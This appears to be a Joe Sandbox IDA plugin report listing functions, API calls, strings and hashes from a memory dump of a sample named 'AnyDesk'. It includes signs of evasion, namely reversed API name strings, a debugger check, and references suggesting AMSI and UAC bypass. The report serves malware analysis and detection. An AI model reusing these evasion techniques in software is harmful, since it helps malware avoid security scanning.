Source File: 00000000.00000002.3368479977.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true

Associated: 00000000.00000002.3368459409.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368560990.0000000002B4E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368717343.0000000002BA7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368717343.0000000002C9C000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368717343.0000000002C9E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2b20000_AnyDesk.jbxd

Similarity

API ID: Message
String ID: $ bytes: $7$An unexpected memory leak has occurred. $String$The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak$Unknown
API String ID: 2030045667-32948583
Opcode ID: c23bb6dbf804dfa212af208e29c2b8a1bac33dc7e20c90816ef1d6ffbfd66889
Instruction ID: d8ec37bf54023c472a0b0cb362f96a389033e59445ea010331ca872da9c16fed
Opcode Fuzzy Hash: c23bb6dbf804dfa212af208e29c2b8a1bac33dc7e20c90816ef1d6ffbfd66889
Instruction Fuzzy Hash: 93A1B131A043748BDB21AA2CCC84B99B6E5EB09350F1441E5ED4DEB286CB7599CECF51

Function 02B2252E Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 188COMMON

Download Yara Rule

Strings

Unexpected Memory Leak, xrefs: 02B228C0
bytes: , xrefs: 02B2275D
, xrefs: 02B22814
7, xrefs: 02B226A1
The sizes of unexpected leaked medium and large blocks are: , xrefs: 02B22849
An unexpected memory leak has occurred. , xrefs: 02B22690
The unexpected small block leaks are:, xrefs: 02B22707

Memory Dump Source

Source File: 00000000.00000002.3368479977.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true

Associated: 00000000.00000002.3368459409.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368560990.0000000002B4E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368717343.0000000002BA7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368717343.0000000002C9C000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368717343.0000000002C9E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2b20000_AnyDesk.jbxd

Similarity

API ID:
String ID: $ bytes: $7$An unexpected memory leak has occurred. $The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak
API String ID: 0-2723507874
Opcode ID: 123235cb23b1358099092c9034c33894c18cbf84052cc985d46f8b39c99fb160
Instruction ID: cde9e5c0c948248ce887d8249eb5793d8fd1e7d713e824c759b4d00fdfd15c5a
Opcode Fuzzy Hash: 123235cb23b1358099092c9034c33894c18cbf84052cc985d46f8b39c99fb160
Instruction Fuzzy Hash: ED71B230A083B88FDF219A2CCC84BD9BAE5EB09344F1441E5D94DEB281DB758AC9CF51

Function 02B2BDC0 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 201threadCOMMON

Download Yara Rule

APIs

GetThreadLocale.KERNEL32(00000000,02B2C08B,?,?,00000000,00000000), ref: 02B2BDF6

Part of subcall function 02B2A7C4: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02B2A7E2

Strings

:mm:ss, xrefs: 02B2C046
mmmm d, yyyy, xrefs: 02B2BEF2
AMPM, xrefs: 02B2C00A
m/d/yy, xrefs: 02B2BEC5
:mm, xrefs: 02B2C029
AMPM , xrefs: 02B2C019

Memory Dump Source

Source File: 00000000.00000002.3368479977.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true

Associated: 00000000.00000002.3368459409.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368560990.0000000002B4E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368717343.0000000002BA7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368717343.0000000002C9C000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368717343.0000000002C9E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2b20000_AnyDesk.jbxd

Similarity

API ID: Locale$InfoThread
String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
API String ID: 4232894706-2493093252
Opcode ID: c7b0feed52277b1e427316a36ee256b67e41eebc30372fc3901e9e8952bde9b5
Instruction ID: d14ce2d0cd396daf16bcb900c42cd60befd179236d77440887146bf20d08e871
Opcode Fuzzy Hash: c7b0feed52277b1e427316a36ee256b67e41eebc30372fc3901e9e8952bde9b5
Instruction Fuzzy Hash: B4619331B003689BDF00EBA4D890B9F7BBBDB88300F1085F6E1099B645CA39D90D8F55

Function 02B3AFE0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 102COMMON

Download Yara Rule

APIs

IsBadReadPtr.KERNEL32(?,00000004), ref: 02B3B000
GetModuleHandleW.KERNEL32(KernelBase,LoadLibraryExA,?,00000004,?,00000014), ref: 02B3B017
IsBadReadPtr.KERNEL32(?,00000004), ref: 02B3B0AB
IsBadReadPtr.KERNEL32(?,00000002), ref: 02B3B0B7
IsBadReadPtr.KERNEL32(?,00000014), ref: 02B3B0CB

Strings

LoadLibraryExA, xrefs: 02B3B00D
KernelBase, xrefs: 02B3B012

Memory Dump Source

Source File: 00000000.00000002.3368479977.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true

Associated: 00000000.00000002.3368459409.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368560990.0000000002B4E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368717343.0000000002BA7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368717343.0000000002C9C000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368717343.0000000002C9E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2b20000_AnyDesk.jbxd

Similarity

API ID: Read$HandleModule
String ID: KernelBase$LoadLibraryExA
API String ID: 2226866862-113032527
Opcode ID: 4972dfebe8d299cfb00ea11c4ea2c5a00b0bbcafdf3e0311b206edd163d0ab77
Instruction ID: 684f9a4b7335dbeba6fbc1705389e280d54ae551f2c60d1506eea1b0df903e38
Opcode Fuzzy Hash: 4972dfebe8d299cfb00ea11c4ea2c5a00b0bbcafdf3e0311b206edd163d0ab77
Instruction Fuzzy Hash: 66317271A40705BBDB21DBA8CC85F5E77A8FF05368F004691FA64EB2C5D730A944CBA0

Function 02B2435C Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 38filewindowCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02B24423,?,?,02BA67C8,?,?,02B4E7A8,02B265B1,02B4D30D), ref: 02B24395
WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02B24423,?,?,02BA67C8,?,?,02B4E7A8,02B265B1,02B4D30D), ref: 02B2439B
GetStdHandle.KERNEL32(000000F5,02B243E4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02B24423,?,?,02BA67C8), ref: 02B243B0
WriteFile.KERNEL32(00000000,000000F5,02B243E4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02B24423,?,?), ref: 02B243B6
MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 02B243D4

Strings

Error, xrefs: 02B243C8
Runtime error at 00000000, xrefs: 02B2438E, 02B243CD

Memory Dump Source

Source File: 00000000.00000002.3368479977.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true

Associated: 00000000.00000002.3368459409.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368560990.0000000002B4E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368717343.0000000002BA7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368717343.0000000002C9C000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368717343.0000000002C9E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2b20000_AnyDesk.jbxd

Similarity

API ID: FileHandleWrite$Message
String ID: Error$Runtime error at 00000000
API String ID: 1570097196-2970929446
Opcode ID: d18e94c172ff2a488f98f07e4c5a79ca196de5e498eee2013d920b2a1a41f448
Instruction ID: d1ad5809786bf51d618c366d8ddd5a35ea03908849a76fc327334a8123ece8d8
Opcode Fuzzy Hash: d18e94c172ff2a488f98f07e4c5a79ca196de5e498eee2013d920b2a1a41f448
Instruction Fuzzy Hash: 33F0F671AE4330B4F610A2646D47F59377D9744B62F104AD5B32C554D187F490CC9721

Function 02B2AEC4 Relevance: 10.6, APIs: 7, Instructions: 56filewindowCOMMON

Download Yara Rule

APIs

Part of subcall function 02B2AD3C: VirtualQuery.KERNEL32(?,?,0000001C), ref: 02B2AD59
Part of subcall function 02B2AD3C: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 02B2AD7D
Part of subcall function 02B2AD3C: GetModuleFileNameA.KERNEL32(02B20000,?,00000105), ref: 02B2AD98
Part of subcall function 02B2AD3C: LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 02B2AE2E

CharToOemA.USER32(?,?), ref: 02B2AEFB
GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 02B2AF18
WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,?,?), ref: 02B2AF1E
GetStdHandle.KERNEL32(000000F4,02B2AF88,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 02B2AF33
WriteFile.KERNEL32(00000000,000000F4,02B2AF88,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 02B2AF39
LoadStringA.USER32(00000000,0000FFEA,?,00000040), ref: 02B2AF5B
MessageBoxA.USER32(00000000,?,?,00002010), ref: 02B2AF71

Memory Dump Source

Source File: 00000000.00000002.3368479977.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true

Associated: 00000000.00000002.3368459409.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368560990.0000000002B4E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368717343.0000000002BA7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368717343.0000000002C9C000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368717343.0000000002C9E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2b20000_AnyDesk.jbxd

Similarity

API ID: File$HandleLoadModuleNameStringWrite$CharMessageQueryVirtual
String ID:
API String ID: 185507032-0
Opcode ID: f582af90590af2815378c8e62a32343089ca91262ecb7ec7f3ae43548712b4f0
Instruction ID: dae949cf2b0ace3b349ba98480399412a42746c24b3ae62cbafaadc2d8ff29f2
Opcode Fuzzy Hash: f582af90590af2815378c8e62a32343089ca91262ecb7ec7f3ae43548712b4f0
Instruction Fuzzy Hash: 3A112AB2548320AED700FBA4DC85F9B77EDAB44740F404AA5BB58D70E0DA75E9488B62

Function 02B2E58C Relevance: 9.1, APIs: 6, Instructions: 139COMMON

Download Yara Rule

APIs

SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 02B2E625
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 02B2E641
SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 02B2E67A
SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 02B2E6F7
SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 02B2E710
VariantCopy.OLEAUT32(?,00000000), ref: 02B2E745

Memory Dump Source

Source File: 00000000.00000002.3368479977.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true

Associated: 00000000.00000002.3368459409.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368560990.0000000002B4E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368717343.0000000002BA7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368717343.0000000002C9C000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368717343.0000000002C9E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2b20000_AnyDesk.jbxd

Similarity

API ID: ArraySafe$BoundIndex$CopyCreateVariant
String ID:
API String ID: 351091851-0
Opcode ID: 2c879650c84341011691a20226c27d6524aee0beb2559d3f6bcac5042424fc10
Instruction ID: 905eace72bb4a65dacb93e83521761491562da128f75b980024300b6ec3dff4f
Opcode Fuzzy Hash: 2c879650c84341011691a20226c27d6524aee0beb2559d3f6bcac5042424fc10
Instruction Fuzzy Hash: 2651F775A117299BCB26DF59C880BDAB3BDAF49300F0045D5EA0CE7211DA30EF898F65

Function 02B23598 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02B235BA
RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,02B23609,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02B235ED
RegCloseKey.ADVAPI32(?,02B23610,00000000,?,00000004,00000000,02B23609,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02B23603

Strings

FPUMaskValue, xrefs: 02B235E4
SOFTWARE\Borland\Delphi\RTL, xrefs: 02B235B0

Memory Dump Source

Source File: 00000000.00000002.3368479977.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true

Associated: 00000000.00000002.3368459409.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368560990.0000000002B4E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368717343.0000000002BA7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368717343.0000000002C9C000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368717343.0000000002C9E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2b20000_AnyDesk.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
API String ID: 3677997916-4173385793
Opcode ID: 556c83bf6b60e1a5519087b5f1682b559aece30153f09baf6d7f2e5e63e84bd3
Instruction ID: 55c1b87b21aa38ad064c5123b4d3ca9898c29a9d5115834b75f3b337e387ee0e
Opcode Fuzzy Hash: 556c83bf6b60e1a5519087b5f1682b559aece30153f09baf6d7f2e5e63e84bd3
Instruction Fuzzy Hash: 9D01B975D54328BAEB12DF908D42BB977ECE708B00F1005E1BA08D7780E674A914CA59

Function 02B38274 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 44libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B382FC,?,?,00000000,00000000,?,02B38215,00000000,KernelBASE,00000000,00000000,02B3823C), ref: 02B382C1
GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B382C7
GetProcAddress.KERNEL32(?,?), ref: 02B382D9

Strings

sserddAcorPteG, xrefs: 02B3828F
Kernel32, xrefs: 02B382BC

Memory Dump Source

Source File: 00000000.00000002.3368479977.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true

Associated: 00000000.00000002.3368459409.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368560990.0000000002B4E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368717343.0000000002BA7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368717343.0000000002C9C000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368717343.0000000002C9E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2b20000_AnyDesk.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: Kernel32$sserddAcorPteG
API String ID: 667068680-1372893251
Opcode ID: 21a7272927d44431fabb653e945347233449aa1b2d59f2375d1fd0be83d63944
Instruction ID: e515fd8d09da502b9b98bb8b09a4424d230bf7ab0008860debacd40b5cc6ef51
Opcode Fuzzy Hash: 21a7272927d44431fabb653e945347233449aa1b2d59f2375d1fd0be83d63944
Instruction Fuzzy Hash: 5F014F75644314AFEB02EBA4DC41A9EB7FEEB48B00F5184E0B904D7A10DA70A905DE25

Function 02B2AA50 Relevance: 7.6, APIs: 5, Instructions: 50threadCOMMON

Download Yara Rule

APIs

GetThreadLocale.KERNEL32(?,00000000,02B2AAE7,?,?,00000000), ref: 02B2AA68

Part of subcall function 02B2A7C4: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02B2A7E2

GetThreadLocale.KERNEL32(00000000,00000004,00000000,02B2AAE7,?,?,00000000), ref: 02B2AA98
EnumCalendarInfoA.KERNEL32(Function_0000A99C,00000000,00000000,00000004), ref: 02B2AAA3
GetThreadLocale.KERNEL32(00000000,00000003,00000000,02B2AAE7,?,?,00000000), ref: 02B2AAC1
EnumCalendarInfoA.KERNEL32(Function_0000A9D8,00000000,00000000,00000003), ref: 02B2AACC

Memory Dump Source

Source File: 00000000.00000002.3368479977.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true

Associated: 00000000.00000002.3368459409.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368560990.0000000002B4E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368717343.0000000002BA7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368717343.0000000002C9C000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368717343.0000000002C9E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2b20000_AnyDesk.jbxd

Similarity

API ID: Locale$InfoThread$CalendarEnum
String ID:
API String ID: 4102113445-0
Opcode ID: 71e5dd4d71e5f06787dbb82fed9c5f0bac54ef77fc0b62ccc4c022b134e96445
Instruction ID: c882d84fa7f5f5be9b9bbd9172ada5ce95bb77a66d7bfbb66aa70cf7ccfe06ad
Opcode Fuzzy Hash: 71e5dd4d71e5f06787dbb82fed9c5f0bac54ef77fc0b62ccc4c022b134e96445
Instruction Fuzzy Hash: 650142B1200724AFFA12BA64CD11BAA735EDF82B10F5001F0F118E66D0DA659E0C8A28

Function 02B2AB00 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148threadCOMMON

Download Yara Rule

APIs

GetThreadLocale.KERNEL32(?,00000000,02B2ACD0,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 02B2AB2F

Part of subcall function 02B2A7C4: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02B2A7E2

Strings

ggg, xrefs: 02B2AC15
eeee, xrefs: 02B2AC3E
yyyy, xrefs: 02B2AC25

Memory Dump Source

Source File: 00000000.00000002.3368479977.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true

Associated: 00000000.00000002.3368459409.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368560990.0000000002B4E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368717343.0000000002BA7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368717343.0000000002C9C000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368717343.0000000002C9E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2b20000_AnyDesk.jbxd

Similarity

API ID: Locale$InfoThread
String ID: eeee$ggg$yyyy
API String ID: 4232894706-1253427255
Opcode ID: d1cb2b59595d9638ac34e2214495acc1f9e3bd8fdf2b2483c8775eb2c040ce49
Instruction ID: 90563617135ff31e02237bd69ce80186f1b53e4338550f175636bae781ac3a22
Opcode Fuzzy Hash: d1cb2b59595d9638ac34e2214495acc1f9e3bd8fdf2b2483c8775eb2c040ce49
Instruction Fuzzy Hash: 1741D1717043344BDB12EB788C946BEB3FBEB85200B1455E6D45EC3754EA28ED0DCA65

Function 02B381CC Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 36COMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02B3823C,?,?,00000000,?,02B37A7E,ntdll,00000000,00000000,02B37AC3,?,?,00000000), ref: 02B3820A

Part of subcall function 02B38274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B382FC,?,?,00000000,00000000,?,02B38215,00000000,KernelBASE,00000000,00000000,02B3823C), ref: 02B382C1
Part of subcall function 02B38274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B382C7
Part of subcall function 02B38274: GetProcAddress.KERNEL32(?,?), ref: 02B382D9

GetModuleHandleA.KERNELBASE(?), ref: 02B3821E

Strings

KernelBASE, xrefs: 02B38205
AeldnaHeludoMteG, xrefs: 02B381E5

Memory Dump Source

Source File: 00000000.00000002.3368479977.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true

Associated: 00000000.00000002.3368459409.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368560990.0000000002B4E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368717343.0000000002BA7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368717343.0000000002C9C000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368717343.0000000002C9E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2b20000_AnyDesk.jbxd

Similarity

API ID: HandleModule$AddressProc
String ID: AeldnaHeludoMteG$KernelBASE
API String ID: 1883125708-1952140341
Opcode ID: 4c7ba4d54c513ff9d564605fb73c75bdba09b750c6f5291a81ee15d51a68a104
Instruction ID: 3d275dfc3d1d4c0c9cfae198c011713592d8a798a1f0a65732edfbf51036c03f
Opcode Fuzzy Hash: 4c7ba4d54c513ff9d564605fb73c75bdba09b750c6f5291a81ee15d51a68a104
Instruction Fuzzy Hash: D2F06271A88704BFE702EBA4DC1195EF7FDF74974075248E0B84493A10DA70AE149D26

Function 02B3F6E8 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KernelBase,?,02B3FAEB,UacInitialize,02BA7380,02B4B7B8,OpenSession,02BA7380,02B4B7B8,ScanBuffer,02BA7380,02B4B7B8,ScanString,02BA7380,02B4B7B8,Initialize), ref: 02B3F6EE
GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 02B3F700

Strings

IsDebuggerPresent, xrefs: 02B3F6FA
KernelBase, xrefs: 02B3F6E9

Memory Dump Source

Source File: 00000000.00000002.3368479977.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true

Associated: 00000000.00000002.3368459409.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368560990.0000000002B4E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368717343.0000000002BA7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368717343.0000000002C9C000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368717343.0000000002C9E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2b20000_AnyDesk.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: IsDebuggerPresent$KernelBase
API String ID: 1646373207-2367923768
Opcode ID: f8de74c3616cad4ea9320995555b9cff265f0c634632e38e9f3e5e1fc8a36afd
Instruction ID: 519dd592fcd81c6078aa964e16ad1ebac1b5422887424b45acf2bf92c5c509da
Opcode Fuzzy Hash: f8de74c3616cad4ea9320995555b9cff265f0c634632e38e9f3e5e1fc8a36afd
Instruction Fuzzy Hash: B3D012B1B5136059BE0276F41CC4829238D875452D7200EE1B026C64A2E5A6881D5054

Function 02B2C474 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,?,02B4D10B,00000000,02B4D11E), ref: 02B2C47A
GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 02B2C48B

Strings

GetDiskFreeSpaceExA, xrefs: 02B2C485
kernel32.dll, xrefs: 02B2C475

Memory Dump Source

Source File: 00000000.00000002.3368479977.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true

Associated: 00000000.00000002.3368459409.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368560990.0000000002B4E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368717343.0000000002BA7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368717343.0000000002C9C000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368717343.0000000002C9E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2b20000_AnyDesk.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: GetDiskFreeSpaceExA$kernel32.dll
API String ID: 1646373207-3712701948
Opcode ID: 9047f40aa714d270ccffae8ebc9649befd635c139b966cf8ff44f7974fe8d8b9
Instruction ID: 69788cd69ac7e0eeaa20156db12c61cd2f5fa8df40543428bba8f71a9cfce9ef
Opcode Fuzzy Hash: 9047f40aa714d270ccffae8ebc9649befd635c139b966cf8ff44f7974fe8d8b9
Instruction Fuzzy Hash: 57D05EB8A407749AFA01AAB254C067B2BD8F728350F0948E6F41D46100E766A41C8F55

Function 02B2E1E8 Relevance: 6.1, APIs: 4, Instructions: 115COMMON

Download Yara Rule

APIs

SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 02B2E297
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 02B2E2B3
SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 02B2E32A
VariantClear.OLEAUT32(?), ref: 02B2E353

Memory Dump Source

Source File: 00000000.00000002.3368479977.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true

Associated: 00000000.00000002.3368459409.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368560990.0000000002B4E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368717343.0000000002BA7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368717343.0000000002C9C000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368717343.0000000002C9E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2b20000_AnyDesk.jbxd

Similarity

API ID: ArraySafe$Bound$ClearIndexVariant
String ID:
API String ID: 920484758-0
Opcode ID: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
Instruction ID: 5621d2aa40ec810402abb6419f07ea05697595123261d7d9924f46c805132a81
Opcode Fuzzy Hash: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
Instruction Fuzzy Hash: 1B410775A013299BCB62DB59CD90BCAB3BDEF48304F0041D5E64DA7211DA30EF898F65

Function 02B2AD3C Relevance: 6.1, APIs: 4, Instructions: 102COMMON

Download Yara Rule

APIs

VirtualQuery.KERNEL32(?,?,0000001C), ref: 02B2AD59
GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 02B2AD7D
GetModuleFileNameA.KERNEL32(02B20000,?,00000105), ref: 02B2AD98
LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 02B2AE2E

Memory Dump Source

Source File: 00000000.00000002.3368479977.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true

Associated: 00000000.00000002.3368459409.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368560990.0000000002B4E000.00000004.00001000.00020000.00000000.sdmpDownload File
